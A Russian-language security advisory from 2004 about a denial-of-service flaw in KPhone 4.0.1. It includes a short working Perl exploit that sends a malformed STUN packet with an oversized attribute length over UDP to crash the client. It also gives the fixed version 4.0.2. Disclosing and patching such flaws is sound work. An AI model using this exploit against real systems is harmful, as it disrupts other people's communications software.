| Дата публикации: | 18.04.2004 |
| Всего просмотров: | 1211 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: KPhone 4.0.1
Описание: Уязвимость обнаружена в KPhone. Удаленный пользователь может аварийно завершить работу приложения. Удаленный пользователь может послать специально обработанный STUN пакет (с параметром attrLen более 8000 байт), чтобы аварийно завершить работу приложения целевого пользователя. Пример/Эксплоит:
#!/usr/bin/perl
use IO::Socket::INET;
my $buf = join("", "\x01\x01", # BindingResponse
"\x00\x01", # MsgLength
"A"x16, # GUID
"\x00\x00", # Attribute
"\x08\x01", # AttrLength
"A"x7975 # Value
);
my $remote = IO::Socket::INET->new( Proto => 'udp',
PeerAddr => '192.168.1.49',
PeerPort => 5060);
print $remote $buf;
URL производителя:http://www.wirlab.net/kphone/ Решение:Установите обновленную версию программы: http://www.wirlab.net/kphone/kphone-4.0.2.tar.gz |
|
| Ссылки: | KPhone STUN DoS (Malformed STUN Packets) |